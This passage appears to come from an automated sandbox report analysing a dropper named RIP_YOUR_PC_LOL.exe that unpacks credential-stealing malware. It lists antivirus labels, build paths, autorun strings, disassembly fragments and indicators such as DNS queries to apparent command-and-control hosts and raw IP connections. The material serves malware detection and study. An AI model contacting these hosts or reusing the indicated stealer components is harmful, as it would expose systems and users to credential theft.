Source: 5.0.Pluto Panel.exe.f10000.4.unpack, Avira: Label: TR/AD.MExecute.lzrac
Source: 5.0.Pluto Panel.exe.f10000.4.unpack, Avira: Label: SPR/Tool.MailPassView.473
Source: 0.0.RIP_YOUR_PC_LOL.exe.d587a1.6.unpack, Avira: Label: TR/Crypt.XPACK.Gen7
Source: 5.0.Pluto Panel.exe.f10000.12.unpack, Avira: Label: TR/AD.MExecute.lzrac
Source: 5.0.Pluto Panel.exe.f10000.12.unpack, Avira: Label: SPR/Tool.MailPassView.473
Source: 5.0.Pluto Panel.exe.f10000.0.unpack, Avira: Label: TR/AD.MExecute.lzrac
Source: 5.0.Pluto Panel.exe.f10000.0.unpack, Avira: Label: SPR/Tool.MailPassView.473
Source: 6.0.test.exe.da0000.3.unpack, Avira: Label: TR/Dropper.Gen
Source: 0.2.RIP_YOUR_PC_LOL.exe.5821276.21.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 0.1.RIP_YOUR_PC_LOL.exe.e387f7.7.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.RIP_YOUR_PC_LOL.exe.1f6c52e.15.unpack, Avira: Label: TR/Dropper.Gen
Source: 0.2.RIP_YOUR_PC_LOL.exe.1f6c52e.15.unpack, Avira: Label: TR/Dropper.Gen
Source: 12.0.aaa.exe.2c0000.3.unpack, Avira: Label: TR/Dropper.MSIL.Gen
Source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpack, Avira: Label: TR/Inject.vcoldi
Source: 7.2.0fd7de5367376231a788872005d7ed4f.exe.24f15a0.1.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.4bdf52.11.unpack, Avira: Label: TR/Dropper.Gen
Source: 0.1.RIP_YOUR_PC_LOL.exe.ea57bf.8.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.400000.0.unpack, Avira: Label: TR/Dropper.Gen
Source: 4.2.healastounding.exe.44c50a8.8.unpack, Avira: Label: TR/Dropper.Gen
Source: 0.2.RIP_YOUR_PC_LOL.exe.57b42ae.20.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 17.0.mediaget.exe.ab0000.2.unpack, Avira: Label: TR/ATRAPS.Gen
Source: 9.0.Opus.exe.840000.2.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 8.0.gay.exe.d0000.3.unpack, Avira: Label: TR/ATRAPS.Gen
Source: 4.0.healastounding.exe.900000.8.unpack, Avira: Label: TR/AD.RedLineSteal.cjshc
Source: 4.0.healastounding.exe.900000.8.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 6.0.test.exe.da0000.1.unpack, Avira: Label: TR/Dropper.Gen
Source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: RIP_YOUR_PC_LOL.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe, File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: RIP_YOUR_PC_LOL.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, healastounding.exe, healastounding.exe, 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, 4.exe, 00000010.00000000.446983407.0000000001203000.00000002.00000001.01000000.0000000E.sdmp, 4.exe, 00000010.00000002.519990989.0000000001203000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: D:\buildbot\slave1\desktop_screen\build\bin\active_desktop_launcher.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmp
                    Source: Binary string: C:\nutideyebibede\soy\gebetugito\meliyo zodoz.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 00000007.00000000.407475822.000000000041E000.00000002.00000001.01000000.00000008.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 00000007.00000002.465903756.000000000041E000.00000002.00000001.01000000.00000008.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 0000000F.00000000.436842136.000000000041E000.00000002.00000001.01000000.00000008.sdmp
                    Source: Binary string: ]C:\nutideyebibede\soy\gebetugito\meliyo zodoz.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 00000007.00000000.407475822.000000000041E000.00000002.00000001.01000000.00000008.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 00000007.00000002.465903756.000000000041E000.00000002.00000001.01000000.00000008.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 0000000F.00000000.436842136.000000000041E000.00000002.00000001.01000000.00000008.sdmp
                    Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Pluto Panel.exe, 00000005.00000002.710948269.0000000003B3A000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.712472379.0000000007710000.00000004.00000001.00040000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.705753147.0000000003691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.706244077.0000000003705000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp
                    Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: autorun.inf
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: [autorun]
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: autorun.inf
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: [autorun]
                    Source: healastounding.exe | Binary or memory string: autorun.inf
                    Source: healastounding.exe | Binary or memory string: [autorun]
                    Source: healastounding.exe, 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp | Binary or memory string: autorun.inf
                    Source: healastounding.exe, 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp | Binary or memory string: [autorun]
                    Source: healastounding.exe, 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: autorun.inf
                    Source: healastounding.exe, 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: [autorun]
                    Source: Pluto Panel.exe | Binary or memory string: [autorun]
                    Source: Pluto Panel.exe | Binary or memory string: autorun.inf
                    Source: Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: autorun.inf
                    Source: Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: [autorun]
                    Source: gay.exe | Binary or memory string: autorun.inf
                    Source: gay.exe | Binary or memory string: [autorun]
                    Source: gay.exe, 00000008.00000000.411478373.00000000000D2000.00000002.00000001.01000000.00000009.sdmp | Binary or memory string: autorun.inf
                    Source: gay.exe, 00000008.00000000.411478373.00000000000D2000.00000002.00000001.01000000.00000009.sdmp | Binary or memory string: [autorun]
                    Source: gay.exe, 00000008.00000002.451519757.0000000002744000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: autorun.inf
                    Source: gay.exe, 00000008.00000002.451519757.0000000002744000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: [autorun]
                    Source: mediaget.exe, 00000011.00000000.445953483.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp | Binary or memory string: autorun.inf
                    Source: mediaget.exe, 00000011.00000000.445953483.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp | Binary or memory string: [autorun]
                    Source: mediaget.exe, 00000011.00000003.646152049.0000000001338000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: autorun.inf
                    Source: mediaget.exe, 00000011.00000003.646152049.0000000001338000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [autorun]
                    Source: mediaget.exe, 00000011.00000002.704209643.00000000032B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: autorun.inf
                    Source: mediaget.exe, 00000011.00000002.704209643.00000000032B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: [autorun]
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 5_2_03200728
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 5_2_03206711
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe | Code function: 4x nop then call 03201B20h | 5_2_03208714
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 5_2_03208714
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 5_2_03205B71
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe | Code function: 4x nop then jmp 03201A73h | 5_2_032019A0
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe | Code function: 4x nop then jmp 03201A73h | 5_2_032019B0
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 5_2_03209596
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 5_2_032017F8
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe | Code function: 4x nop then call 03201B20h | 5_2_032087FE
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 5_2_032087FE
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe | Code function: 4x nop then call 03201B20h | 5_2_03207FCA
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 5_2_03207FCA
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe | Code function: 4x nop then mov esp, ebp | 5_2_0320482F
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 5_2_03206038
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 5_2_03208E09
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe | Code function: 4x nop then lea esp, dword ptr [ebp-08h] | 5_2_032076A8
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 5_2_032094AC
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe | Code function: 4x nop then lea esp, dword ptr [ebp-08h] | 5_2_03207698
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 5_2_032014C0
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 5_2_03208AC3
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 5_2_03205CCE

                    Networking

                    Source: DNS query: yabynennet.xyz
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe | DNS query: name: api.ipify.org (3 identical entries)
                    Source: unknown | DNS query: name: whatismyipaddress.com (10 identical entries)
                    Source: unknown | DNS query: name: gfhhjgh.duckdns.org
                    Source: global traffic | HTTP traffic detected: GET /?format=xml HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.ipify.org | Connection: Keep-Alive
                    Source: global traffic | TCP traffic: 192.168.2.6:49768 -> 179.13.1.253:8050
                    Source: global traffic | TCP traffic: 192.168.2.6:49774 -> 41.249.51.34:1470
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp | String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                    Source: Pluto Panel.exe, 00000005.00000002.712709095.0000000008430000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmp | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                    Source: Pluto Panel.exe, 00000005.00000002.712090794.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0N
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0O
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmp | String found in binary or memory: http://ocsp.thawte.com0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmp | String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmp | String found in binary or memory: http://s2.symcb.com0
                    Source: healastounding.exe | String found in binary or memory: http://schemas.microsof
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmp | String found in binary or memory: http://sv.symcb.com/sv.crl0a
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmp | String found in binary or memory: http://sv.symcb.com/sv.crt0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmp | String found in binary or memory: http://sv.symcd.com0&
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmp | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmp | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmp | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
                    Source: Pluto Panel.exe, 00000005.00000002.705753147.0000000003691000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://whatismyipaddress.com
                    Source: Pluto Panel.exe, Pluto Panel.exe, 00000005.00000002.705753147.0000000003691000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://whatismyipaddress.com/
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp | String found in binary or memory: http://whatismyipaddress.com/-
                    Source: Pluto Panel.exe, 00000005.00000002.712090794.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: Pluto Panel.exe, 00000005.00000003.462837238.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.463380932.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.461983546.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.460984251.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
                    Source: Pluto Panel.exe, 00000005.00000003.445443819.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437487558.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.439099390.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437239432.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.436798009.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437773657.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437023378.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.440045453.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.441297022.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.439790741.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.442021245.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.438069908.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.445694166.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.445564416.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.441503544.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 